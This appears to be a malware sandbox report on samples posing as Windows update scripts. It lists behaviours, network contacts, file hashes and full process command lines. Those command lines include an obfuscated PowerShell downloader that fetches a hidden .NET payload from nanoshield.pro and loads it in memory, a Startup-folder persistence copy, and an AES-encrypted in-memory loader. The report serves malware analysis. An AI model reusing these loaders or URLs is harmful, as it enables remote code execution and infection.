File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Adobe.vbs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\windows_update\update.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreJDgTreB3DgTreGUDgTreYgBDDgTreGwDgTreaQBlDgTreG4DgTredDgTreDgTregDgTreD0DgTreIDgTreBODgTreGUDgTredwDgTretDgTreE8DgTreYgBqDgTreGUDgTreYwB0DgTreCDgTreDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBODgTreGUDgTredDgTreDgTreuDgTreFcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreDsDgTreIDgTreDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCDgTreDgTrePQDgTregDgTreEcDgTreZQB0DgTreC0DgTreUgBhDgTreG4DgTreZDgTreBvDgTreG0DgTreIDgTreDgTretDgTreEkDgTrebgBwDgTreHUDgTredDgTreBPDgTreGIDgTreagBlDgTreGMDgTredDgTreDgTregDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCDgTreDgTreLQBDDgTreG8DgTredQBuDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTreuDgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreDsDgTreIDgTreDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreDgTre0DgTreCgDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreByDgTreGUDgTredDgTreB1DgTreHIDgTrebgDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTregDgTreH0DgTreOwDgTregDgTreDgTre0DgTreCgDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTrebgBhDgTreG4DgTrebwBzDgTreGgDgTreaQBlDgTreGwDgTreZDgTreDgTreuDgTreHDgTreDgTrecgBvDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreMgDgTreuDgTreGoDgTrecDgTreBnDgTreD8DgTreMQDgTre2DgTreDYDgTreMQDgTre1DgTreDQDgTreNwDgTreyDgTreDUDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTrebgBhDgTreG4DgTrebwBzDgTreGgDgTreZDgTreDgTreuDgTreHDgTreDgTrecgBvDgTreC8DgTreZgBpDgTreGwDgTreZQBzDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNDgTreDgTre0DgTreDQDgTreMQDgTre3DgTreDIDgTreMwDgTrenDgTreCkDgTreOwDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreDgTre0DgTreCgDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTreLQBuDgTreGUDgTreIDgTreDgTrekDgTreG4DgTredQBsDgTreGwDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBUDgTreGUDgTreeDgTreB0DgTreC4DgTreRQBuDgTreGMDgTrebwBkDgTreGkDgTrebgBnDgTreF0DgTreOgDgTre6DgTreFUDgTreVDgTreBGDgTreDgDgTreLgBHDgTreGUDgTredDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreDQDgTreKDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreFMDgTreVDgTreBBDgTreFIDgTreVDgTreDgTre+DgTreD4DgTreJwDgTre7DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCDgTreDgTrePQDgTregDgTreCcDgTrePDgTreDgTre8DgTreEIDgTreQQBTDgTreEUDgTreNgDgTre0DgTreF8DgTreRQBODgTreEQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreSQBuDgTreGQDgTreZQB4DgTreE8DgTreZgDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreKQDgTre7DgTreCDgTreDgTreDQDgTreKDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreBpDgTreGYDgTreIDgTreDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwBlDgTreCDgTreDgTreMDgTreDgTregDgTreC0DgTreYQBuDgTreGQDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwB0DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreKwDgTre9DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTreuDgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreDsDgTreIDgTreDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreOwDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTrekDgTreGMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBDDgTreG8DgTrebgB2DgTreGUDgTrecgB0DgTreF0DgTreOgDgTre6DgTreEYDgTrecgBvDgTreG0DgTreQgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreUwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFIDgTreZQBmDgTreGwDgTreZQBjDgTreHQDgTreaQBvDgTreG4DgTreLgBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreXQDgTre6DgTreDoDgTreTDgTreBvDgTreGEDgTreZDgTreDgTreoDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreKQDgTre7DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreCDgTreDgTrePQDgTregDgTreCQDgTrebDgTreBvDgTreGEDgTreZDgTreBlDgTreGQDgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreC4DgTreRwBlDgTreHQDgTreVDgTreB5DgTreHDgTreDgTreZQDgTreoDgTreCcDgTredDgTreBlDgTreHMDgTredDgTreBwDgTreG8DgTredwBlDgTreHIDgTrecwBoDgTreGUDgTrebDgTreBsDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreJDgTreBtDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreLgBHDgTreGUDgTredDgTreBNDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTreoDgTreCcDgTrebDgTreBhDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreHQDgTreeDgTreB0DgTreC4DgTreaQBuDgTreGQDgTreYQBiDgTreGkDgTreZDgTreDgTrevDgTreHMDgTreZQBsDgTreGkDgTreZgDgTrevDgTreG8DgTrecgBwDgTreC4DgTreZDgTreBsDgTreGUDgTreaQBoDgTreHMDgTrebwBuDgTreGEDgTrebgDgTrevDgTreC8DgTreOgBzDgTreHDgTreDgTredDgTreB0DgTreGgDgTreJwDgTresDgTreCDgTreDgTreJwDgTrexDgTreCcDgTreLDgTreDgTregDgTreCcDgTreQQBkDgTreG8DgTreYgBlDgTreCcDgTreKQDgTrepDgTreH0DgTrefQDgTre=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://nanoshield.pro/new_image2.jpg?166154725', 'https://nanoshd.pro/files/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.indabid/selif/orp.dleihsonan//:sptth', '1', 'Adobe'))}}"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Adobe.vbs'"

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 19.40.53.23.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 21.114.53.23.in-addr.arpa udp
US 8.8.8.8:53 nanoshd.pro udp
US 8.8.8.8:53 nanoshield.pro udp
US 104.21.37.30:443 nanoshield.pro tcp
NL 23.62.61.113:443 www.bing.com tcp
US 8.8.8.8:53 30.37.21.104.in-addr.arpa udp
US 8.8.8.8:53 113.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 65.139.73.23.in-addr.arpa udp
US 8.8.8.8:53 241.197.17.2.in-addr.arpa udp
IE 52.111.236.23:443 tcp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4ewdpxzf.is3.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4360-0-0x0000016898170000-0x0000016898192000-memory.dmp

memory/4360-10-0x00007FFFFCFB0000-0x00007FFFFDA71000-memory.dmp

memory/4360-11-0x00000168967F0000-0x0000016896800000-memory.dmp

memory/4360-12-0x00000168967F0000-0x0000016896800000-memory.dmp

memory/1876-22-0x00007FFFFCFB0000-0x00007FFFFDA71000-memory.dmp

memory/1876-24-0x0000019729180000-0x0000019729190000-memory.dmp

memory/1876-23-0x0000019729180000-0x0000019729190000-memory.dmp

memory/1876-25-0x0000019710B20000-0x0000019710B6E000-memory.dmp

memory/3800-35-0x00007FFFFCFB0000-0x00007FFFFDA71000-memory.dmp

memory/3800-36-0x0000019D43030000-0x0000019D43040000-memory.dmp

memory/3800-43-0x00007FFFFCFB0000-0x00007FFFFDA71000-memory.dmp

memory/1876-44-0x0000019729180000-0x0000019729190000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 48874fdc03476cb442d506f5bb796f70
SHA1 2dedcc271d935fe842f7cb4cc03873b6f688d29d
SHA256 15717634eff02490a9e8a4606a3cc8d61876a9efa01b42d6c8bf442bcf8718e0
SHA512 31b5539304c0ad1f781407a60ff019c30192b2fe3e7bd64bf7dc3d5a9263eae6874c8ef960998900d1322d358e38f9eadba40945958fb6ff7719cd1a24644671

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 10e624ec749193e3ec4e8e73e2d74ccd
SHA1 a4200f61c224af1af1e58eec4c83623b2851729c
SHA256 ee3ab03ec8e520c50ab249e06c76761e988a674ddc4fa4bf58cf7e66c8a099a1
SHA512 cae9adc6aaf954d1f999f3c6540c0a3060e74b80b5644118c1e87c37dd47e5576cf315b58d76c0cdeb95dc9cdfb2511763f7fa6873662c47c3f8e76c8602c481

memory/1876-48-0x00007FFFFCFB0000-0x00007FFFFDA71000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a6c9d692ed2826ecb12c09356e69cc09
SHA1 def728a6138cf083d8a7c61337f3c9dade41a37f
SHA256 a07d329eb9b4105ba442c89f7cfa0d7b263f9f0617e26df93cf8cdc8dc94d57b
SHA512 2f27d2b241ce34f988c39e17ca5a1ebe628ac6c1b8ee8df121db9ad8929eaadf5f24ad66457591cccf87e60d2ba2eab88af860ab9c323a5c2a9867045d6e7ba3

memory/4360-51-0x00007FFFFCFB0000-0x00007FFFFDA71000-memory.dmp

Analysis: behavioral19

Detonation Overview

Submitted

2024-04-19 07:49

Reported

2024-04-19 07:52

Platform

win7-20240221-en

Max time kernel

122s

Max time network

128s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\windows_update\upload.cmd"

Signatures

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2208 wrote to memory of 2780 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2208 wrote to memory of 2780 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2208 wrote to memory of 2780 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2208 wrote to memory of 2200 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2208 wrote to memory of 2200 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2208 wrote to memory of 2200 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2200 wrote to memory of 2864 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2200 wrote to memory of 2864 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2200 wrote to memory of 2864 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2200 wrote to memory of 2056 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2200 wrote to memory of 2056 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2200 wrote to memory of 2056 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2200 wrote to memory of 2120 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2200 wrote to memory of 2120 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2200 wrote to memory of 2120 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\windows_update\upload.cmd"

C:\Windows\system32\cmd.exe

cmd /c \"set __=^&rem\

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\windows_update\upload.cmd

C:\Windows\system32\cmd.exe

cmd /c \"set __=^&rem\

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\windows_update\upload.cmd';$MZYP='MadRzGindRzGModdRzGuldRzGedRzG'.Replace('dRzG', ''),'ChQdTpaQdTpngQdTpeEQdTpxteQdTpnsiQdTponQdTp'.Replace('QdTp', ''),'FGJZSroGJZSmBGJZSasGJZSeGJZS6GJZS4GJZSStrGJZSinGJZSgGJZS'.Replace('GJZS', ''),'GfsYwetfsYwCfsYwurfsYwrfsYwentfsYwProfsYwcefsYwssfsYw'.Replace('fsYw', ''),'ElPbFUePbFUmPbFUenPbFUtPbFUAtPbFU'.Replace('PbFU', ''),'InvEnKDoEnKDkeEnKD'.Replace('EnKD', ''),'Decnyejomnyejprnyejenyejssnyej'.Replace('nyej', ''),'LoaCsUjdCsUj'.Replace('CsUj', ''),'SXMnypliXMnytXMny'.Replace('XMny', ''),'ReYChsadYChsLinYChsesYChs'.Replace('YChs', ''),'TraTpWrnsTpWrfoTpWrrmTpWrFinTpWralTpWrBlTpWrockTpWr'.Replace('TpWr', ''),'CrjagKeajagKtjagKeDejagKcrjagKyjagKpjagKtorjagK'.Replace('jagK', ''),'EqqjYnqqjYtryqqjYPoiqqjYntqqjY'.Replace('qqjY', ''),'CCMrToCMrTpCMrTyToCMrT'.Replace('CMrT', '');powershell -w hidden;function lezXx($vAHtD){$fMpHn=[System.Security.Cryptography.Aes]::Create();$fMpHn.Mode=[System.Security.Cryptography.CipherMode]::CBC;$fMpHn.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$fMpHn.Key=[System.Convert]::($MZYP[2])('Vz0NaMXoskkNfAZDSYL9QEs4+Pg8xizh89PafV/0IEc=');$fMpHn.IV=[System.Convert]::($MZYP[2])('YYQFWZml9Xmr8vgNBAedtQ==');$LBVjX=$fMpHn.($MZYP[11])();$OrsvL=$LBVjX.($MZYP[10])($vAHtD,0,$vAHtD.Length);$LBVjX.Dispose();$fMpHn.Dispose();$OrsvL;}function UqmQx($vAHtD){$YXBBI=New-Object System.IO.MemoryStream(,$vAHtD);$DXQeR=New-Object System.IO.MemoryStream;$GSEpw=New-Object System.IO.Compression.GZipStream($YXBBI,[IO.Compression.CompressionMode]::($MZYP[6]));$GSEpw.($MZYP[13])($DXQeR);$GSEpw.Dispose();$YXBBI.Dispose();$DXQeR.Dispose();$DXQeR.ToArray();}$GbEwM=[System.IO.File]::($MZYP[9])([Console]::Title);$PQord=UqmQx (lezXx ([Convert]::($MZYP[2])([System.Linq.Enumerable]::($MZYP[4])($GbEwM, 5).Substring(2))));$GigRn=UqmQx (lezXx ([Convert]::($MZYP[2])([System.Linq.Enumerable]::($MZYP[4])($GbEwM, 6).Substring(2))));[System.Reflection.Assembly]::($MZYP[7])([byte[]]$GigRn).($MZYP[12]).($MZYP[5])($null,$null);[System.Reflection.Assembly]::($MZYP[7])([byte[]]$PQord).($MZYP[12]).($MZYP[5])($null,$null); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Network

N/A

Files

memory/2120-4-0x000000001B2E0000-0x000000001B5C2000-memory.dmp

memory/2120-5-0x000007FEF58F0000-0x000007FEF628D000-memory.dmp

memory/2120-7-0x0000000002460000-0x0000000002468000-memory.dmp

memory/2120-8-0x000007FEF58F0000-0x000007FEF628D000-memory.dmp

memory/2120-6-0x0000000002950000-0x00000000029D0000-memory.dmp

memory/2120-9-0x0000000002950000-0x00000000029D0000-memory.dmp

memory/2120-10-0x0000000002950000-0x00000000029D0000-memory.dmp

memory/2120-11-0x0000000002950000-0x00000000029D0000-memory.dmp

memory/2120-12-0x000007FEF58F0000-0x000007FEF628D000-memory.dmp

memory/2120-13-0x0000000002950000-0x00000000029D0000-memory.dmp

memory/2120-14-0x0000000002950000-0x00000000029D0000-memory.dmp

memory/2120-15-0x0000000002950000-0x00000000029D0000-memory.dmp

Analysis: behavioral21

Detonation Overview

Submitted

2024-04-19 07:49

Reported

2024-04-19 07:52

Platform

win7-20240221-en

Max time kernel

120s

Max time network

125s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\windows_update\upload.vbs"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
